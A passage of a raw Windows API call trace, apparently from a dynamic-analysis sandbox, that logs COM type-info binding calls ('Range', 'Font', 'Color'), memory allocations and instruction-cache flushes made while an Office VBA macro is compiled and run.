lpWideCharStr=0x33e4fb4790, cchWideChar=7 | out: lpWideCharStr="Range") returned 6 [0060.427] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="Range", lHashVal=0x500cda, wFlags=0x3, ppTInfo=0x33e4fb4748, pDescKind=0x33e4fb475c, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x7ffce08ad504, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb4748*=0x1d39d552b18, pDescKind=0x33e4fb475c*=1, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x7ffce08ad504, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.427] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d9ec6d0 | out: ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d9ec6d0*=0x0) returned 0x0 [0060.427] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.427] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d552b18, hreftype=0x6a00, ppTInfo=0x33e4fb4008 | out: ppTInfo=0x33e4fb4008*=0x1d39d55b128) returned 0x0 [0060.427] IUnknown:QueryInterface (in: This=0x1d39d55b128, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb41d8 | out: ppvObject=0x33e4fb41d8*=0x0) returned 0x80004002 [0060.427] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b128, ppTypeAttr=0x33e4fb4058, pDummy=0x33e4fb41d8 | out: ppTypeAttr=0x33e4fb4058, pDummy=0x33e4fb41d8*=0x0) returned 0x0 [0060.427] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b128) returned 0x0 [0060.427] ITypeInfo:GetRefTypeOfImplType (in: This=0x1d39d55b128, index=0xffffffff, pRefType=0x33e4fb403c | out: pRefType=0x33e4fb403c*=0xfffffffe) returned 0x0 [0060.427] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d55b128, hreftype=0xfffffffe, ppTInfo=0x33e4fb4008 | out: ppTInfo=0x33e4fb4008*=0x1d39d55b180) returned 0x0 [0060.427] IUnknown:Release (This=0x1d39d55b128) returned 0x1 [0060.427] IUnknown:Release (This=0x1d39d55b180) returned 0x1 [0060.427] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d98d4d0, cb=0x400) returned 0x1d3984b9280 [0060.427] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb4500, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4500, pDummy=0x0) returned 0x0 [0060.427] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.427] IUnknown:Release (This=0x1d39d55b180) returned 0x1 [0060.427] IUnknown:Release (This=0x1d39d55b180) returned 0x1 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb45b0 | out: ppvObject=0x33e4fb45b0*=0x1d39d552b18) returned 0x0 [0060.428] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d552b18, memid=2000, invkind=1, pFuncIndex=0x33e4fb45f0 | out: pFuncIndex=0x33e4fb45f0*=0xab) returned 0x0 [0060.428] ITypeInfo2:GetFuncCustData (in: This=0x1d39d552b18, index=0xab, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb4608 | out: pVarVal=0x33e4fb4608*(varType=0x0, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1=0x33e4fb46b0, varVal2=0x33e4fb4790)) returned 0x0 [0060.428] IUnknown:Release (This=0x1d39d552b18) returned 0x4 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4568 | out: ppvObject=0x33e4fb4568*=0x0) returned 0x80004002 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4440 | out: ppvObject=0x33e4fb4440*=0x0) returned 0x80004002 [0060.428] IUnknown:Release (This=0x1d39d55b180) returned 0x1 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4568 | out: ppvObject=0x33e4fb4568*=0x0) returned 0x80004002 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4440 | out: ppvObject=0x33e4fb4440*=0x0) returned 0x80004002 [0060.428] IUnknown:Release (This=0x1d39d55b180) returned 0x1 [0060.428] IUnknown:AddRef (This=0x1d39d552b18) returned 0x5 [0060.428] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.428] IUnknown:Release (This=0x1d39d552b18) returned 0x4 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4808 | out: ppvObject=0x33e4fb4808*=0x0) returned 0x80004002 [0060.428] IUnknown:AddRef (This=0x1d39d552b18) returned 0x5 [0060.428] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d7be8d0, cb=0x80) returned 0x1d39d827850 [0060.428] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbe9c70, cb=0xa0) returned 0x1d39dc0efe0 [0060.428] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4978 | out: ppvObject=0x33e4fb4978*=0x0) returned 0x80004002 [0060.428] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4970 | out: ppvObject=0x33e4fb4970*=0x0) returned 0x80004002 [0060.428] IUnknown:AddRef (This=0x1d39d552b18) returned 0x6 [0060.428] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01a26 | out: ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01a26*=0x0) returned 0x0 [0060.428] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.428] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.429] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.429] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.429] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.429] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.429] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.429] GetCurrentProcess () returned 0xffffffffffffffff [0060.429] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x5c) returned 1 [0060.429] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.429] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb4160, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4160, pDummy=0x0) returned 0x0 [0060.429] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.429] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4c98 | out: ppvObject=0x33e4fb4c98*=0x0) returned 0x80004002 [0060.429] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4ca0 | out: ppvObject=0x33e4fb4ca0*=0x0) returned 0x80004002 [0060.429] ITypeInfo:GetTypeComp (in: This=0x1d39d55b180, ppTComp=0x33e4fb4ca8 | out: ppTComp=0x33e4fb4ca8*=0x1d39d55b188) returned 0x0 [0060.429] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a3830 [0060.429] IUnknown:AddRef (This=0x1d39d55b188) returned 0x5 [0060.429] IUnknown:Release (This=0x1d39d55b188) returned 0x4 [0060.429] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dc0deb0, cb=0xb0) returned 0x1d39da81b40 [0060.429] IUnknown:Release (This=0x1d39d55b180) returned 0x3 [0060.429] IUnknown:Release (This=0x1d39d55b180) returned 0x2 [0060.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172d92, cbMultiByte=5, lpWideCharStr=0x33e4fb4790, cchWideChar=6 | out: lpWideCharStr="Font") returned 5 [0060.429] ITypeComp:RemoteBind (in: This=0x1d39d55b188, szName="Font", lHashVal=0x501055, wFlags=0x3, ppTInfo=0x33e4fb4748, pDescKind=0x33e4fb475c, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x33e4fb4740, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb4748*=0x1d39d55b180, pDescKind=0x33e4fb475c*=1, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x33e4fb4740, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.429] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b180, ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d966060 | out: ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d966060*=0x0) returned 0x0 [0060.429] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b180) returned 0x0 [0060.429] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d55b180, hreftype=0xbf80, ppTInfo=0x33e4fb4008 | out: ppTInfo=0x33e4fb4008*=0x1d39d55b1d8) returned 0x0 [0060.429] IUnknown:QueryInterface (in: This=0x1d39d55b1d8, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb41d8 | out: ppvObject=0x33e4fb41d8*=0x0) returned 0x80004002 [0060.429] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b1d8, ppTypeAttr=0x33e4fb4058, pDummy=0x33e4fb41d8 | out: ppTypeAttr=0x33e4fb4058, pDummy=0x33e4fb41d8*=0x0) returned 0x0 [0060.429] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b1d8) returned 0x0 [0060.430] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.430] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b180, ppTypeAttr=0x33e4fb4500, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4500, pDummy=0x0) returned 0x0 [0060.430] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b180) returned 0x0 [0060.430] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.430] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb45b0 | out: ppvObject=0x33e4fb45b0*=0x1d39d55b180) returned 0x0 [0060.430] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d55b180, memid=5, invkind=2, pFuncIndex=0x33e4fb45f0 | out: pFuncIndex=0x33e4fb45f0*=0x8) returned 0x0 [0060.430] ITypeInfo2:GetFuncCustData (in: This=0x1d39d55b180, index=0x8, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb4608 | out: pVarVal=0x33e4fb4608*(varType=0x0, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1=0x33e4fb46b0, varVal2=0x33e4fb4790)) returned 0x0 [0060.430] IUnknown:Release (This=0x1d39d55b180) returned 0x3 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b1d8, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4568 | out: ppvObject=0x33e4fb4568*=0x0) returned 0x80004002 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b1d8, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4440 | out: ppvObject=0x33e4fb4440*=0x0) returned 0x80004002 [0060.430] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b1d8, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4568 | out: ppvObject=0x33e4fb4568*=0x0) returned 0x80004002 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b1d8, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4440 | out: ppvObject=0x33e4fb4440*=0x0) returned 0x80004002 [0060.430] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.430] IUnknown:AddRef (This=0x1d39d55b180) returned 0x4 [0060.430] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d55b180) returned 0x0 [0060.430] IUnknown:Release (This=0x1d39d55b180) returned 0x3 [0060.430] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4808 | out: ppvObject=0x33e4fb4808*=0x0) returned 0x80004002 [0060.430] IUnknown:AddRef (This=0x1d39d55b180) returned 0x4 [0060.430] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d98e340, cb=0x400) returned 0x1d3984ba6d0 [0060.431] IUnknown:Release (This=0x1d39d55b180) returned 0x4 [0060.431] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4978 | out: ppvObject=0x33e4fb4978*=0x0) returned 0x80004002 [0060.431] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4970 | out: ppvObject=0x33e4fb4970*=0x0) returned 0x80004002 [0060.431] IUnknown:AddRef (This=0x1d39d55b180) returned 0x5 [0060.431] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b180, ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01ae6 | out: ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01ae6*=0x4) returned 0x0 [0060.431] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b180) returned 0x0 [0060.431] IUnknown:Release (This=0x1d39d55b180) returned 0x4 [0060.431] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.431] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.431] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.431] GetCurrentProcess () returned 0xffffffffffffffff [0060.431] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4c) returned 1 [0060.431] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.431] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b180, ppTypeAttr=0x33e4fb4160, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4160, pDummy=0x0) returned 0x0 [0060.431] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b180) returned 0x0 [0060.431] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39dbc6b30 [0060.432] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4c98 | out: ppvObject=0x33e4fb4c98*=0x0) returned 0x80004002 [0060.432] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4ca0 | out: ppvObject=0x33e4fb4ca0*=0x0) returned 0x80004002 [0060.432] ITypeInfo:GetTypeComp (in: This=0x1d39d55b288, ppTComp=0x33e4fb4ca8 | out: ppTComp=0x33e4fb4ca8*=0x1d39d55b290) returned 0x0 [0060.432] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a3ff0 [0060.432] IUnknown:AddRef (This=0x1d39d55b290) returned 0x3 [0060.432] IUnknown:Release (This=0x1d39d55b290) returned 0x2 [0060.432] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39da81b40, cb=0xc0) returned 0x1d39d7d32a0 [0060.432] IUnknown:Release (This=0x1d39d55b288) returned 0x1 [0060.432] IUnknown:Release (This=0x1d39d55b1d8) returned 0x1 [0060.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172dba, cbMultiByte=6, lpWideCharStr=0x33e4fb4790, cchWideChar=7 | out: lpWideCharStr="Color") returned 6 [0060.432] ITypeComp:RemoteBind (in: This=0x1d39d55b290, szName="Color", lHashVal=0x504632, wFlags=0x5, ppTInfo=0x33e4fb4748, pDescKind=0x33e4fb475c, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x33e4fb4740, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb4748*=0x1d39d55b288, pDescKind=0x33e4fb475c*=1, ppFuncDesc=0x33e4fb4760, ppVarDesc=0x33e4fb4740, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.432] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b288, ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d7d8b20 | out: ppTypeAttr=0x33e4fb4750, pDummy=0x1d39d7d8b20*=0x9d7d0000) returned 0x0 [0060.432] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b288) returned 0x0 [0060.432] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d55b288, hreftype=0xcf80, ppTInfo=0x33e4fb4488 | out: ppTInfo=0x33e4fb4488*=0x1d39d552cd0) returned 0x0 [0060.432] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4658 | out: ppvObject=0x33e4fb4658*=0x0) returned 0x80004002 [0060.432] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552cd0, ppTypeAttr=0x33e4fb44d8, pDummy=0x33e4fb4658 | out: ppTypeAttr=0x33e4fb44d8, pDummy=0x33e4fb4658*=0x0) returned 0x0 [0060.432] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552cd0) returned 0x0 [0060.432] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d81bb20, cb=0x40) returned 0x1d39d7be8d0 [0060.432] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d81bc40, cb=0x50) returned 0x1d39dbe95b0 [0060.432] IUnknown:Release (This=0x1d39d552cd0) returned 0x3 [0060.432] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b288, ppTypeAttr=0x33e4fb4500, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4500, pDummy=0x0) returned 0x0 [0060.432] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b288) returned 0x0 [0060.432] IUnknown:Release (This=0x1d39d552cd0) returned 0x3 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb45b0 | out: ppvObject=0x33e4fb45b0*=0x1d39d55b288) returned 0x0 [0060.433] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d55b288, memid=159, invkind=4, pFuncIndex=0x33e4fb45f0 | out: pFuncIndex=0x33e4fb45f0*=0x42) returned 0x0 [0060.433] ITypeInfo2:GetFuncCustData (in: This=0x1d39d55b288, index=0x42, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb4608 | out: pVarVal=0x33e4fb4608*(varType=0x0, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1=0x33e4fb46b0, varVal2=0x33e4fb4790)) returned 0x0 [0060.433] IUnknown:Release (This=0x1d39d55b288) returned 0x2 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb44a8 | out: ppvObject=0x33e4fb44a8*=0x0) returned 0x80004002 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4568 | out: ppvObject=0x33e4fb4568*=0x0) returned 0x80004002 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4440 | out: ppvObject=0x33e4fb4440*=0x0) returned 0x80004002 [0060.433] IUnknown:Release (This=0x1d39d552cd0) returned 0x3 [0060.433] IUnknown:AddRef (This=0x1d39d55b288) returned 0x3 [0060.433] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d55b288) returned 0x0 [0060.433] IUnknown:Release (This=0x1d39d55b288) returned 0x2 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4808 | out: ppvObject=0x33e4fb4808*=0x0) returned 0x80004002 [0060.433] IUnknown:AddRef (This=0x1d39d55b288) returned 0x3 [0060.433] IUnknown:Release (This=0x1d39d55b288) returned 0x3 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4978 | out: ppvObject=0x33e4fb4978*=0x0) returned 0x80004002 [0060.433] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4970 | out: ppvObject=0x33e4fb4970*=0x0) returned 0x80004002 [0060.433] IUnknown:AddRef (This=0x1d39d55b288) returned 0x4 [0060.433] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b288, ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01d66 | out: ppTypeAttr=0x33e4fb4bc8, pDummy=0x1d3a3d01d66*=0x4) returned 0x0 [0060.433] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b288) returned 0x0 [0060.433] IUnknown:Release (This=0x1d39d55b288) returned 0x3 [0060.434] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.434] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.434] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.434] GetCurrentProcess () returned 0xffffffffffffffff [0060.434] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4c) returned 1 [0060.434] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.434] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d55b288, ppTypeAttr=0x33e4fb4160, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4160, pDummy=0x0) returned 0x0 [0060.434] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d55b288) returned 0x0 [0060.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 